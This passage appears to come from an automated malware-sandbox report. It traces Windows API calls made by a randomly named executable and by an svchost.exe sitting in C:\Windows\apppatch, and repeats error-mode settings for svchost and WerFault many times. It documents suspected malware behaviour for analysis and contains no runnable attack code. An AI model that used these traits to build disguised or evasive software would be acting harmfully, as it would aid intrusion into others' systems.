      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0244CE19
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02449C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_02449C80
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ED130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,8_2_012ED130
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ECB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,8_2_012ECB80
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_012ECBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_012ECBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_012ECBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_012ECBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E9C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,8_2_012E9C80
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ECE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_012ECE19
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012ECE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_012ECE19
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2BA40 HeapCreate,GetCurrentProcessId,RegisterWindowMessageA,OpenFileMappingA,OpenMutexA,MapViewOfFile,OpenFileMappingA,OpenMutexA,OpenMutexA,MapViewOfFile,Sleep,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,WaitForSingleObject,WaitForSingleObject,OpenFileMappingA,MapViewOfFile,ReleaseMutex,GetHandleInformation,CloseHandle,Sleep,ReleaseMutex,WaitForSingleObject,OpenFileMappingA,MapViewOfFile,ReleaseMutex,OpenEventA,GetTickCount,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,1_2_02D2BA40
      Source: C:\Windows\apppatch\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
